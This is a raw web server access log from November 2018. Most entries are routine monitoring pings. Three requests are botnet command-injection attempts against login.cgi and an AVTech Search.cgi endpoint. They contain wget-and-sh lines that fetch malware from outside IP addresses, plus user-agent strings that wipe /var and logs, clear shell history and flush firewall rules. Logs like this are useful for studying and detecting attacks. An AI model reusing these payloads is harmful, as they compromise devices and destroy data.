156.210.96.2 - - [01/Nov/2018:10:32:21 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
86.203.80.242 - - [01/Nov/2018:10:33:40 +0100] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 329 "-" "Dark"
212.91.246.72 - - [01/Nov/2018:10:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:37:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:38:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.150.46.200 - - [01/Nov/2018:10:39:00 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:10:39:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:10:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.56.203.114 - - [01/Nov/2018:10:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
